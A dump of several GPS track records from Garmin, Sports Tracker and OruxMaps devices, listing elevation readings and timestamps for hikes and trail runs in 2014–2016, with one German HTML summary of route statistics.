+2016-02-04T10:49:12Z
+
+
+1545.27
+2016-02-04T10:49:38Z
+
+
+1557.5
+2016-02-04T10:52:41Z
+
+
+1578.2
+2016-02-04T10:56:05Z
+
+
+1605.27
+2016-02-04T10:59:04Z
+
+
+1624.26
+2016-02-04T11:01:45Z
+
+
+1642.27
+2016-02-04T11:04:32Z
+
+
+1663.32
+2016-02-04T11:07:17Z
+
+
+1672.9
+2016-02-04T11:09:51Z
+
+
+1662.77
+2016-02-04T11:14:00Z
+
+
+1674.92
+2016-02-04T11:14:02Z
+
+
+1687.54
+2016-02-04T11:14:28Z
+
+
+1677.39
+2016-02-04T11:15:36Z
+
+
+1702.88
+2016-02-04T11:24:11Z
+
+
+1724.24
+2016-02-04T11:27:15Z
+
+
+1747.64
+2016-02-04T11:30:44Z
+
+
+1766.28
+2016-02-04T11:33:22Z
+
+
+1795.26
+2016-02-04T11:38:00Z
+
+
+1820.24
+2016-02-04T11:42:26Z
+
+
+1858.35
+2016-02-04T11:54:13Z
+
+
+1871.79
+2016-02-04T11:57:11Z
+
+
+1919.77
+2016-02-04T12:06:06Z
+
+
+1937.38
+2016-02-04T12:09:39Z
+
+
+1927.74
+2016-02-04T12:11:12Z
+
+
+1936.24
+2016-02-04T12:13:24Z
+
+
+1950.43
+2016-02-04T12:15:44Z
+
+
+1948.39
+2016-02-04T12:16:49Z
+
+
+1944.39
+2016-02-04T12:17:30Z
+
+
+1942.33
+2016-02-04T12:19:00Z
+
+
+1980.14
+2016-02-04T12:23:36Z
+
+
+2007.81
+2016-02-04T12:27:51Z
+
+
+2029.27
+2016-02-04T12:31:18Z
+
+
+2038.14
+2016-02-04T12:32:13Z
+
+
+2073.26
+2016-02-04T12:37:01Z
+
+
+2080.27
+2016-02-04T12:39:36Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-10-03T16:31:34Z
+
+2016-10-03 13:16:13-Trail Run
+
+
+
+
+
+1612.75
+2016-10-03T09:01:54Z
+
+
+1610.83
+2016-10-03T09:02:25Z
+
+
+1621.88
+2016-10-03T09:03:16Z
+
+
+1624.77
+2016-10-03T09:03:40Z
+
+
+1635.82
+2016-10-03T09:04:34Z
+
+
+1644.95
+2016-10-03T09:05:54Z
+
+
+1664.66
+2016-10-03T09:07:40Z
+
+
+1689.17
+2016-10-03T09:10:39Z
+
+
+1700.23
+2016-10-03T09:11:53Z
+
+
+1708.4
+2016-10-03T09:13:29Z
+
+
+1722.34
+2016-10-03T09:15:43Z
+
+
+1734.36
+2016-10-03T09:17:04Z
+
+
+1738.2
+2016-10-03T09:17:35Z
+
+
+1745.41
+2016-10-03T09:18:14Z
+
+
+1748.29
+2016-10-03T09:18:30Z
+
+
+1755.99
+2016-10-03T09:19:11Z
+
+
+1768.0
+2016-10-03T09:21:11Z
+
+
+1795.4
+2016-10-03T09:23:47Z
+
+
+1804.53
+2016-10-03T09:25:26Z
+
+
+1815.11
+2016-10-03T09:26:46Z
+
+
+1828.08
+2016-10-03T09:28:38Z
+
+
+1847.31
+2016-10-03T09:31:11Z
+
+
+1863.17
+2016-10-03T09:32:29Z
+
+
+1867.98
+2016-10-03T09:32:56Z
+
+
+1877.59
+2016-10-03T09:34:08Z
+
+
+1907.39
+2016-10-03T09:39:01Z
+
+
+1913.16
+2016-10-03T09:39:42Z
+
+
+1950.17
+2016-10-03T09:43:20Z
+
+
+1966.03
+2016-10-03T09:44:38Z
+
+
+1973.72
+2016-10-03T09:45:29Z
+
+
+1993.91
+2016-10-03T09:47:31Z
+
+
+1998.24
+2016-10-03T09:48:39Z
+
+
+2016.5
+2016-10-03T09:51:14Z
+
+
+2018.91
+2016-10-03T09:52:16Z
+
+
+2022.75
+2016-10-03T09:53:09Z
+
+
+2024.67
+2016-10-03T09:54:28Z
+
+
+2033.33
+2016-10-03T10:02:36Z
+
+
+2040.05
+2016-10-03T10:03:40Z
+
+
+2051.11
+2016-10-03T10:05:41Z
+
+
+2053.99
+2016-10-03T10:06:04Z
+
+
+2058.8
+2016-10-03T10:07:27Z
+
+
+2083.31
+2016-10-03T10:11:30Z
+
+
+2091.49
+2016-10-03T10:12:41Z
+
+
+2101.1
+2016-10-03T10:13:35Z
+
+
+2107.83
+2016-10-03T10:14:30Z
+
+
+2114.56
+2016-10-03T10:15:00Z
+
+
+2126.57
+2016-10-03T10:16:02Z
+
+
+2138.59
+2016-10-03T10:20:13Z
+
+
+2146.76
+2016-10-03T10:20:52Z
+
+
+2153.97
+2016-10-03T10:21:29Z
+
+
+2169.35
+2016-10-03T10:23:09Z
+
+
+2182.33
+2016-10-03T10:25:42Z
+
+
+2210.21
+2016-10-03T10:29:29Z
+
+
+2240.97
+2016-10-03T10:32:01Z
+
+
+2259.24
+2016-10-03T10:34:02Z
+
+
+2280.38
+2016-10-03T10:36:56Z
+
+
+2292.4
+2016-10-03T10:38:15Z
+
+
+2304.42
+2016-10-03T10:39:59Z
+
+
+2309.22
+2016-10-03T10:40:23Z
+
+
+2341.43
+2016-10-03T10:43:34Z
+
+
+2345.27
+2016-10-03T10:44:12Z
+
+
+2366.42
+2016-10-03T10:46:25Z
+
+
+2366.9
+2016-10-03T10:47:23Z
+
+
+2382.76
+2016-10-03T10:49:48Z
+
+
+2398.63
+2016-10-03T10:52:13Z
+
+
+2413.05
+2016-10-03T10:56:56Z
+
+
+2427.95
+2016-10-03T10:59:46Z
+
+
+2449.58
+2016-10-03T11:01:35Z
+
+
+2458.71
+2016-10-03T11:02:46Z
+
+
+2467.84
+2016-10-03T11:04:01Z
+
+
+2472.17
+2016-10-03T11:04:52Z
+
+
+2485.15
+2016-10-03T11:09:08Z
+
+
+2501.01
+2016-10-03T11:10:31Z
+
+
+2513.5
+2016-10-03T11:14:21Z
+
+
+2518.79
+2016-10-03T11:16:08Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+19.07.2015 11:39
+
+Andre Bartholdi
+
+
+
+Sports Tracker
+
+
+
+
+3671.0
+2015-07-19T11:39:29Z
+
+
+3655.0
+2015-07-19T11:41:18Z
+
+
+3650.0
+2015-07-19T11:42:15Z
+
+
+3642.0
+2015-07-19T11:42:41Z
+
+
+3625.0
+2015-07-19T11:44:26Z
+
+
+3618.0
+2015-07-19T11:47:40Z
+
+
+3615.0
+2015-07-19T11:48:45Z
+
+
+3591.0
+2015-07-19T11:51:12Z
+
+
+3596.0
+2015-07-19T11:52:17Z
+
+
+3575.0
+2015-07-19T11:52:43Z
+
+
+3553.0
+2015-07-19T11:56:07Z
+
+
+3522.0
+2015-07-19T12:02:10Z
+
+
+3500.0
+2015-07-19T12:05:08Z
+
+
+3476.0
+2015-07-19T12:06:21Z
+
+
+3495.0
+2015-07-19T12:09:09Z
+
+
+3490.0
+2015-07-19T12:10:27Z
+
+
+3477.0
+2015-07-19T12:13:48Z
+
+
+3469.0
+2015-07-19T12:16:10Z
+
+
+3474.0
+2015-07-19T12:16:37Z
+
+
+3474.0
+2015-07-19T12:16:44Z
+
+
+3461.0
+2015-07-19T12:17:21Z
+
+
+3464.0
+2015-07-19T12:18:25Z
+
+
+3469.0
+2015-07-19T12:18:32Z
+
+
+3463.0
+2015-07-19T12:19:54Z
+
+
+3465.0
+2015-07-19T12:21:51Z
+ "
+"
+
+
+Mourre Fray
+
+
+
+
+
+OruxMaps
+2015-11-26T09:15:58Z
+
+
+Mourre Fray
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mourre Fray</h2><br /><p>Startzeit: 11/26/2015 10:15</p><p>Zielzeit: 11/26/2015 12:05</p><p>Strecke: 4,3km (01:49)</p><p>Bewegungszeit: 01:16</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 1189m</p><p>Maximale Höhe: 2024m</p><p>Steig-Geschw.: 474,4m/h</p><p>Sink-Geschw.: -633,8m/h</p><p>Aufstieg: 834m</p><p>Abstieg: -27m</p><p>Steigzeit: 01:45</p><p>Sinkzeit: 00:02</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1218.25
+2015-11-26T09:15:59Z
+
+
+1189.05
+2015-11-26T09:16:45Z
+
+
+1190.06
+2015-11-26T09:17:03Z
+
+
+1203.76
+2015-11-26T09:18:14Z
+
+
+1208.26
+2015-11-26T09:18:50Z
+
+
+1219.52
+2015-11-26T09:19:51Z
+
+
+1226.5
+2015-11-26T09:20:59Z
+
+
+1244.43
+2015-11-26T09:22:22Z
+
+
+1243.93
+2015-11-26T09:22:43Z
+
+
+1255.43
+2015-11-26T09:24:43Z
+
+
+1271.21
+2015-11-26T09:26:18Z
+
+
+1272.43
+2015-11-26T09:27:28Z
+
+
+1290.27
+2015-11-26T09:28:43Z
+
+
+1293.02
+2015-11-26T09:29:38Z
+
+
+1296.58
+2015-11-26T09:30:07Z
+
+
+1319.86
+2015-11-26T09:33:08Z
+
+
+1316.83
+2015-11-26T09:33:50Z
+
+
+1322.18
+2015-11-26T09:34:50Z
+
+
+1317.62
+2015-11-26T09:35:48Z
+
+
+1356.9
+2015-11-26T09:39:38Z
+
+
+1386.93
+2015-11-26T09:43:05Z
+
+
+1418.8
+2015-11-26T09:46:39Z
+
+
+1427.93
+2015-11-26T09:48:02Z
+
+
+1429.77
+2015-11-26T09:48:56Z
+
+
+1447.56
+2015-11-26T09:50:06Z
+
+
+1466.43
+2015-11-26T09:51:37Z
+
+
+1465.77
+2015-11-26T09:55:09Z
+
+
+1474.31
+2015-11-26T09:58:44Z
+
+
+1513.8
+2015-11-26T10:03:35Z
+
+
+1522.11
+2015-11-26T10:05:29Z
+
+
+1530.81
+2015-11-26T10:05:52Z
+
+
+1612.67
+2015-11-26T10:15:42Z
+
+
+1637.99
+2015-11-26T10:18:00Z
+
+
+1659.46
+2015-11-26T10:21:25Z
+
+
+1728.61
+2015-11-26T10:27:50Z
+
+
+1767.43
+2015-11-26T10:32:14Z
+
+
+1818.7
+2015-11-26T10:38:20Z
+
+
+1845.93
+2015-11-26T10:41:10Z
+
+
+1848.8
+2015-11-26T10:41:43Z
+
+
+1849.68
+2015-11-26T10:41:47Z
+
+
+1877.93
+2015-11-26T10:45:41Z
+
+
+1908.18
+2015-11-26T10:48:14Z
+
+
+1924.48
+2015-11-26T10:50:08Z
+
+
+1947.42
+2015-11-26T10:53:27Z
+
+
+1958.93
+2015-11-26T10:54:48Z
+
+
+1956.43
+2015-11-26T10:55:12Z
+
+
+1965.8
+2015-11-26T10:55:58Z
+
+
+1968.05
+2015-11-26T10:56:26Z
+
+
+1980.93
+2015-11-26T10:58:24Z
+
+
+1996.92
+2015-11-26T11:01:00Z
+
+
+2000.94
+2015-11-26T11:01:23Z
+
+
+2014.94
+2015-11-26T11:03:28Z
+
+
+2023.94
+2015-11-26T11:05:29Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-24T14:39:24Z
+
+2015-04-24 16:39:22
+
+
+
+
+
+
+1022.69
+2015-04-24T07:10:25Z
+
+
+1023.46
+2015-04-24T07:16:37Z
+
+
+1021.04
+2015-04-24T07:17:57Z
+
+
+1019.05
+2015-04-24T07:18:51Z
+
+
+1016.36
+2015-04-24T07:22:04Z
+
+
+1035.15
+2015-04-24T07:24:21Z
+
+
+1040.08
+2015-04-24T07:25:28Z
+
+
+1038.76
+2015-04-24T07:26:30Z
+
+
+1052.84
+2015-04-24T07:32:12Z
+
+
+1059.55
+2015-04-24T07:33:12Z
+
+
+1067.75
+2015-04-24T07:34:38Z
+
+
+1080.91
+2015-04-24T07:35:45Z
+
+
+1108.46
+2015-04-24T07:38:22Z
+
+
+1131.93
+2015-04-24T07:41:04Z
+
+
+1138.61
+2015-04-24T07:42:33Z
+
+
+1147.63
+2015-04-24T07:43:53Z
+
+
+1160.96
+2015-04-24T07:46:06Z
+
+
+1172.87
+2015-04-24T07:47:39Z
+
+
+1185.4
+2015-04-24T07:56:44Z
+
+
+1220.15
+2015-04-24T07:59:53Z
+
+
+1289.88
+2015-04-24T08:07:54Z
+
+
+1328.83
+2015-04-24T08:11:20Z
+
+
+1378.66
+2015-04-24T08:17:11Z
+
+
+1484.76
+2015-04-24T09:09:04Z
+
+
+1541.93
+2015-04-24T09:15:45Z
+
+
+1577.62
+2015-04-24T09:42:49Z
+
+
+1602.48
+2015-04-24T10:12:31Z
+
+
+1651.7
+2015-04-24T10:59:08Z
+
+
+1661.18
+2015-04-24T11:02:20Z
+
+
+1632.4
+2015-04-24T12:07:34Z
+
+
+1624.47
+2015-04-24T12:29:26Z
+
+
+1577.57
+2015-04-24T12:49:15Z
+
+
+1579.97
+2015-04-24T13:04:45Z
+
+
+1510.45
+2015-04-24T13:18:11Z
+
+
+1487.33
+2015-04-24T13:25:44Z
+
+
+1424.39
+2015-04-24T13:48:36Z
+
+
+1402.27
+2015-04-24T13:52:26Z
+
+
+1320.54
+2015-04-24T13:57:23Z
+
+
+1217.62
+2015-04-24T14:02:01Z
+
+
+1187.21
+2015-04-24T14:03:17Z
+
+
+1182.22
+2015-04-24T14:05:17Z
+
+
+1169.67
+2015-04-24T14:06:24Z
+
+
+1155.48
+2015-04-24T14:07:40Z
+
+
+1139.86
+2015-04-24T14:10:04Z
+
+
+1115.28
+2015-04-24T14:12:05Z
+
+
+1088.21
+2015-04-24T14:14:05Z
+
+
+1076.73
+2015-04-24T14:15:07Z
+
+
+1068.71
+2015-04-24T14:17:07Z
+
+
+1063.68
+2015-04-24T14:18:07Z
+
+
+1057.41
+2015-04-24T14:19:01Z
+
+
+1052.59
+2015-04-24T14:19:58Z
+
+
+1048.71
+2015-04-24T14:23:01Z
+
+
+1049.93
+2015-04-24T14:23:58Z
+
+
+1026.23
+2015-04-24T14:26:42Z
+
+
+1028.72
+2015-04-24T14:29:37Z
+
+
+1029.94
+2015-04-24T14:31:36Z
+
+
+1032.65
+2015-04-24T14:33:34Z
+
+
+1031.48
+2015-04-24T14:39:19Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-03-23T15:55:04Z
+
+2015-03-23 16:55:00
+
+
+
+
+
+
+935.0
+2015-03-23T14:15:28Z
+
+
+938.24
+2015-03-23T14:16:58Z
+
+
+944.21
+2015-03-23T14:18:04Z
+
+
+946.53
+2015-03-23T14:19:44Z
+
+
+964.03
+2015-03-23T14:22:48Z
+
+
+974.93
+2015-03-23T14:24:05Z
+
+
+975.11
+2015-03-23T14:25:08Z
+
+
+972.27
+2015-03-23T14:26:54Z
+
+
+972.69
+2015-03-23T14:27:08Z
+
+
+977.93
+2015-03-23T14:27:37Z
+
+
+983.46
+2015-03-23T14:27:57Z
+
+
+1006.14
+2015-03-23T14:29:37Z
+
+
+1027.99
+2015-03-23T14:30:57Z
+
+
+1045.87
+2015-03-23T14:32:25Z
+
+
+1052.42
+2015-03-23T14:33:10Z
+
+
+1060.83
+2015-03-23T15:01:58Z
+
+
+1056.82
+2015-03-23T15:02:56Z
+
+
+1054.86
+2015-03-23T15:03:15Z
+
+
+1055.48
+2015-03-23T15:03:47Z
+
+
+1055.34
+2015-03-23T15:04:01Z
+
+
+1067.82
+2015-03-23T15:06:59Z
+
+
+1055.34
+2015-03-23T15:08:29Z
+
+
+1048.79
+2015-03-23T15:09:39Z
+
+
+1039.28
+2015-03-23T15:11:24Z
+
+
+1023.18
+2015-03-23T15:13:31Z
+
+
+1013.88
+2015-03-23T15:15:27Z
+
+
+1002.41
+2015-03-23T15:16:22Z
+
+
+993.84
+2015-03-23T15:16:59Z
+
+
+987.42
+2015-03-23T15:17:31Z
+
+
+984.9
+2015-03-23T15:17:47Z
+
+
+978.15
+2015-03-23T15:18:36Z
+
+
+970.0
+2015-03-23T15:20:15Z
+
+
+941.28
+2015-03-23T15:23:09Z
+
+
+933.82
+2015-03-23T15:25:10Z
+
+
+929.46
+2015-03-23T15:26:07Z
+
+
+929.83
+2015-03-23T15:27:51Z
+
+
+909.45
+2015-03-23T15:29:37Z
+
+
+902.76
+2015-03-23T15:30:56Z
+
+
+891.51
+2015-03-23T15:31:27Z
+
+
+872.88
+2015-03-23T15:32:31Z
+
+
+869.19
+2015-03-23T15:34:01Z
+
+
+869.04
+2015-03-23T15:35:18Z
+
+
+881.3
+2015-03-23T15:39:25Z
+
+
+887.03
+2015-03-23T15:40:12Z
+
+
+900.8
+2015-03-23T15:42:01Z
+
+
+922.48
+2015-03-23T15:43:57Z
+
+
+927.75
+2015-03-23T15:44:37Z
+
+
+932.63
+2015-03-23T15:45:44Z
+
+
+938.22
+2015-03-23T15:46:54Z
+
+
+942.7
+2015-03-23T15:48:38Z
+
+
+947.41
+2015-03-23T15:49:13Z
+
+
+951.99
+2015-03-23T15:52:14Z
+
+
+942.67
+2015-03-23T15:54:32Z
+
+
+942.84
+2015-03-23T15:54:55Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-04-21T18:49:58Z
+
+
+2014 04 21 Brünnsteinhaus
+
+
+
+
+
+
+818.2578125
+
+
+821.70703125
+
+
+825.1171875
+
+
+834.53125
+
+
+866.0078125
+
+
+900.44921875
+
+
+893.3828125
+
+
+903.98828125
+
+
+915.33984375
+
+
+927.01171875
+
+
+947.32421875
+
+
+945.6953125
+
+
+958.796875
+
+
+993.41015625
+
+
+1015.6640625
+
+
+1026.46875
+
+
+1027.7109375
+
+
+1030.8828125
+
+
+1078.42578125
+
+
+1082.46875
+
+
+1075.16796875
+
+
+1094.1875
+
+
+1100.1484375
+
+
+1133.66796875
+
+
+1122.31640625
+
+
+1141.78515625
+
+
+1149.47265625
+
+
+1173.44140625
+
+
+1168.4140625
+
+
+1182.25390625
+
+
+1197.05859375
+
+
+1214.8515625
+
+
+1215.234375
+
+
+1245.8828125
+
+
+1298.40625
+
+
+1329.9140625
+
+
+1331.04296875
+
+
+1353.66796875
+
+
+1326.70703125
+
+
+1361.140625
+
+
+1336.265625
+
+
+1325.83984375
+
+
+1349.5625
+
+
+1350.69140625
+
+
+1382.94140625
+
+
+1348.48828125
+
+
+1345.00390625
+
+
+1345.84765625
+
+
+1332.703125
+
+
+1324.6484375
+
+
+1356.015625
+
+
+1428.5546875
+
+
+1430.65625
+
+
+1435.796875
+
+
+1431.97265625
+
+
+1399.53515625
+
+
+1395.63671875
+
+
+1393.4453125
+
+
+1369.88671875
+
+
+1333.4453125
+
+
+1303.8515625
+
+
+1272.33984375
+
+
+1254.5859375
+
+
+1220.80078125
+
+
+1224.9609375
+
+
+1174.94921875
+
+
+1176.26171875
+
+
+1133.5078125
+
+
+1120.359375
+
+
+1109.64453125
+
+
+1104.21484375
+
+
+1091.40234375
+
+
+1054.96484375
+
+
+1064.48828125
+
+
+1018.9140625
+
+
+998.015625
+
+
+961.8203125
+
+
+945.390625
+
+
+947.01953125
+
+
+928.16015625
+
+
+917.1875
+
+
+901.1484375
+
+
+891.55859375
+
+
+902.46484375
+
+
+865.96484375
+
+
+832.078125
+
+
+827.5625
+
+
+821.57421875
+
+
+817.9296875
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-01-23T15:32:22Z
+
+
+23-GEN-15 09:32:55
+
+
+
+
+
+
+502.43
+2015-01-23T07:20:01Z
+
+
+508.67
+2015-01-23T07:23:20Z
+
+
+508.19
+2015-01-23T07:24:22Z
+
+
+517.81
+2015-01-23T07:29:29Z
+
+
+521.65
+2015-01-23T07:32:57Z
+
+
+526.94
+2015-01-23T07:34:50Z
+
+
+520.21
+2015-01-23T07:42:36Z
+
+
+519.25
+2015-01-23T07:43:05Z
+
+
+516.85
+2015-01-23T07:44:19Z
+
+
+513.96
+2015-01-23T07:46:13Z
+
+
+514.92
+2015-01-23T07:47:05Z
+
+
+517.33
+2015-01-23T07:47:43Z
+
+
+521.65
+2015-01-23T07:49:13Z
+
+
+523.09
+2015-01-23T07:50:05Z
+
+
+526.94
+2015-01-23T07:53:18Z
+
+
+525.5
+2015-01-23T07:56:32Z
+
+
+527.9
+2015-01-23T07:57:05Z
+
+
+530.79
+2015-01-23T07:57:43Z
+
+
+532.23
+2015-01-23T07:59:54Z
+
+
+527.42
+2015-01-23T08:01:50Z
+
+
+525.5
+2015-01-23T08:03:13Z
+
+
+526.46
+2015-01-23T08:03:59Z
+
+
+526.94
+2015-01-23T08:04:19Z
+
+
+525.02
+2015-01-23T08:05:48Z
+
+
+529.34
+2015-01-23T08:06:48Z
+
+
+530.3
+2015-01-23T08:08:46Z
+
+
+525.98
+2015-01-23T08:16:07Z
+
+
+521.65
+2015-01-23T08:17:07Z
+
+
+524.06
+2015-01-23T08:19:29Z
+
+
+520.21
+2015-01-23T08:20:03Z
+
+
+518.29
+2015-01-23T08:21:56Z
+
+
+516.37
+2015-01-23T08:22:53Z
+
+
+510.6
+2015-01-23T08:24:33Z
+
+
+509.64
+2015-01-23T08:27:53Z
+
+
+507.71
+2015-01-23T08:29:42Z
+
+
+509.64
+2015-01-23T08:32:35Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-29T17:43:45Z
+
+2015-05-29 19:43:43
+
+
+
+
+
+
+1023.2
+2015-05-29T12:55:44Z
+
+
+1025.21
+2015-05-29T13:01:28Z
+
+
+1023.04
+2015-05-29T13:02:26Z
+
+
+1021.54
+2015-05-29T13:03:26Z
+
+
+1017.95
+2015-05-29T13:06:14Z
+
+
+1035.72
+2015-05-29T13:08:23Z
+
+
+1043.32
+2015-05-29T13:09:26Z
+
+
+1041.83
+2015-05-29T13:10:28Z
+
+
+1047.24
+2015-05-29T13:15:31Z
+
+
+1042.15
+2015-05-29T13:16:33Z
+
+
+1039.63
+2015-05-29T13:17:35Z
+
+
+1041.3
+2015-05-29T13:19:33Z
+
+
+1046.49
+2015-05-29T13:20:36Z
+
+
+1051.61
+2015-05-29T13:21:39Z
+
+
+1071.12
+2015-05-29T13:23:27Z
+
+
+1058.85
+2015-05-29T13:24:24Z
+
+
+1059.85
+2015-05-29T13:25:31Z
+
+
+1063.49
+2015-05-29T13:26:44Z
+
+
+1078.86
+2015-05-29T13:32:01Z
+
+
+1148.0
+2015-05-29T13:40:43Z
+
+
+1220.16
+2015-05-29T13:48:23Z
+
+
+1312.47
+2015-05-29T14:01:26Z
+
+
+1345.21
+2015-05-29T14:06:10Z
+
+
+1391.54
+2015-05-29T14:31:16Z
+
+
+1434.1
+2015-05-29T14:37:39Z
+
+
+1473.47
+2015-05-29T14:42:57Z
+
+
+1488.47
+2015-05-29T14:45:16Z
+
+
+1528.98
+2015-05-29T14:49:05Z
+
+
+1636.51
+2015-05-29T15:21:52Z
+
+
+1692.2
+2015-05-29T15:35:29Z
+
+
+1703.15
+2015-05-29T15:57:20Z
+
+
+1697.29
+2015-05-29T16:17:57Z
+
+
+1635.64
+2015-05-29T16:27:31Z
+
+
+1537.69
+2015-05-29T16:34:32Z
+
+
+1529.01
+2015-05-29T16:39:41Z
+
+
+1494.95
+2015-05-29T16:42:21Z
+
+
+1480.12
+2015-05-29T16:43:39Z
+
+
+1455.75
+2015-05-29T16:44:57Z
+
+
+1426.16
+2015-05-29T16:46:35Z
+
+
+1387.39
+2015-05-29T16:51:34Z
+
+
+1369.22
+2015-05-29T16:53:03Z
+
+
+1343.28
+2015-05-29T16:57:06Z
+
+
+1302.27
+2015-05-29T17:00:04Z
+
+
+1263.11
+2015-05-29T17:02:11Z
+
+
+1228.23
+2015-05-29T17:04:29Z
+
+
+1191.45
+2015-05-29T17:06:34Z
+
+
+1146.95
+2015-05-29T17:10:41Z
+
+
+1105.71
+2015-05-29T17:12:53Z
+
+
+1091.27
+2015-05-29T17:13:51Z
+
+
+1082.0
+2015-05-29T17:14:48Z
+
+
+1077.72
+2015-05-29T17:15:43Z
+
+
+1064.27
+2015-05-29T17:18:21Z
+
+
+1055.31
+2015-05-29T17:20:23Z
+
+
+1047.27
+2015-05-29T17:26:05Z
+
+
+1044.67
+2015-05-29T17:26:55Z
+
+
+1044.26
+2015-05-29T17:28:39Z
+
+
+1050.77
+2015-05-29T17:30:05Z
+
+
+1045.94
+2015-05-29T17:33:38Z
+
+
+1047.26
+2015-05-29T17:34:23Z
+
+
+1029.85
+2015-05-29T17:35:29Z
+
+
+1021.58
+2015-05-29T17:36:01Z
+
+
+1024.9
+2015-05-29T17:38:24Z
+
+
+1026.36
+2015-05-29T17:39:15Z
+
+
+1028.12
+2015-05-29T17:40:05Z
+
+
+1027.39
+2015-05-29T17:42:33Z
+
+
+1027.47
+2015-05-29T17:43:19Z
+ "
+"
+
+
+
+ Lovere - S. Giovanni
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+837.400024414062
+2014-05-31T05:24:13Z
+
+
+841.599975585938
+2014-05-31T05:26:02Z
+
+
+849.799987792969
+2014-05-31T05:27:16Z
+
+
+854.0
+2014-05-31T05:28:25Z
+
+
+854.0
+2014-05-31T05:28:37Z
+
+
+849.200012207031
+2014-05-31T05:29:30Z
+
+
+847.0
+2014-05-31T05:30:03Z
+
+
+845.400024414062
+2014-05-31T05:31:13Z
+
+
+843.400024414062
+2014-05-31T05:31:29Z
+
+
+843.400024414062
+2014-05-31T05:32:04Z
+
+
+843.400024414062
+2014-05-31T05:32:39Z
+
+
+839.200012207031
+2014-05-31T05:35:44Z
+
+
+839.200012207031
+2014-05-31T05:36:02Z
+
+
+841.200012207031
+2014-05-31T05:36:27Z
+
+
+838.0
+2014-05-31T05:37:10Z
+
+
+837.200012207031
+2014-05-31T05:37:25Z
+
+
+837.200012207031
+2014-05-31T05:38:11Z
+
+
+837.200012207031
+2014-05-31T05:38:33Z
+
+
+832.400024414062
+2014-05-31T05:38:56Z
+
+
+828.400024414062
+2014-05-31T05:39:25Z
+
+
+825.200012207031
+2014-05-31T05:39:57Z
+
+
+824.0
+2014-05-31T05:40:11Z
+
+
+820.200012207031
+2014-05-31T05:40:34Z
+
+
+816.200012207031
+2014-05-31T05:41:16Z
+
+
+812.400024414062
+2014-05-31T05:42:20Z
+
+
+812.0
+2014-05-31T05:42:58Z
+
+
+808.200012207031
+2014-05-31T05:43:29Z
+
+
+801.799987792969
+2014-05-31T05:44:45Z
+
+
+801.799987792969
+2014-05-31T05:45:16Z
+
+
+801.799987792969
+2014-05-31T05:47:04Z
+
+
+803.799987792969
+2014-05-31T05:47:20Z
+
+
+806.400024414062
+2014-05-31T05:47:39Z
+
+
+829.599975585938
+2014-05-31T05:49:47Z
+
+
+835.0
+2014-05-31T05:50:19Z
+
+
+849.400024414062
+2014-05-31T05:51:28Z
+
+
+869.0
+2014-05-31T05:52:57Z
+
+
+886.200012207031
+2014-05-31T05:54:26Z
+
+
+892.400024414062
+2014-05-31T05:55:02Z
+
+
+898.599975585938
+2014-05-31T05:55:34Z
+
+
+904.400024414062
+2014-05-31T05:56:01Z
+
+
+917.0
+2014-05-31T05:57:17Z
+
+
+926.400024414062
+2014-05-31T05:58:13Z
+
+
+938.400024414062
+2014-05-31T05:59:21Z
+
+
+938.400024414062
+2014-05-31T05:59:29Z
+
+
+944.0
+2014-05-31T06:00:08Z
+
+
+954.400024414062
+2014-05-31T06:00:56Z
+
+
+957.200012207031
+2014-05-31T06:01:11Z
+
+
+959.400024414062
+2014-05-31T06:01:24Z
+
+
+964.0
+2014-05-31T06:01:54Z
+
+
+968.200012207031
+2014-05-31T06:02:14Z
+
+
+978.200012207031
+2014-05-31T06:02:59Z
+
+
+987.400024414062
+2014-05-31T06:03:52Z
+
+
+992.799987792969
+2014-05-31T06:04:18Z
+
+
+1005.20001220703
+2014-05-31T06:05:24Z
+
+
+1015.59997558594
+2014-05-31T06:06:28Z
+
+
+1026.80004882812
+2014-05-31T06:08:16Z
+
+
+1039.80004882812
+2014-05-31T06:09:23Z
+
+
+1059.80004882812
+2014-05-31T06:11:02Z
+
+
+1087.0
+2014-05-31T06:13:36Z
+
+
+1097.0
+2014-05-31T06:14:28Z
+
+
+1116.40002441406
+2014-05-31T06:16:11Z
+
+
+1126.80004882812
+2014-05-31T06:17:23Z
+
+
+1126.80004882812
+2014-05-31T06:17:41Z
+
+
+1126.80004882812
+2014-05-31T06:18:03Z
+
+
+1123.0
+2014-05-31T06:19:08Z
+ "
+"
+
+
+Unterriederi Suone
+
+
+
+
+
+
+
+
+
+812.0
+
+
+805.6999618287044
+
+
+802.2000027517199
+
+
+800.1000080993142
+
+
+787.0
+
+
+779.2999940485074
+
+
+773.8999954985741
+
+
+766.2000163575763
+
+
+748.9999350699937
+
+
+750.9974009492063
+
+
+741.599870321943
+
+
+726.3999835749195
+
+
+707.7000017209044
+
+
+713.299974634871
+
+
+722.2
+
+
+734.8
+
+
+737.2999786492683
+
+
+744.6
+
+
+747.4000162619508
+
+
+750.3000743081255
+
+
+754.3
+
+
+760.4216136064823
+
+
+764.6
+
+
+771.4000136793502
+
+
+776.5999900110428
+
+
+783.2999642387166
+
+
+826.4999623791675
+
+
+848.6999310554835
+
+
+871.4000555595851
+
+
+877.7998955512222
+
+
+894.700166224909
+
+
+939.9000181938868
+
+
+970.2997903993781
+
+
+994.3999415813365
+
+
+1005.1367830621222
+
+
+1026.5999681414314
+
+
+1039.3001153856067
+
+
+1051.8862841296327
+
+
+1061.9721476875948
+
+
+1065.7
+
+
+1064.6999547056373
+
+
+1063.5000293379226
+
+
+1066.8999797107351
+
+
+1070.0
+
+
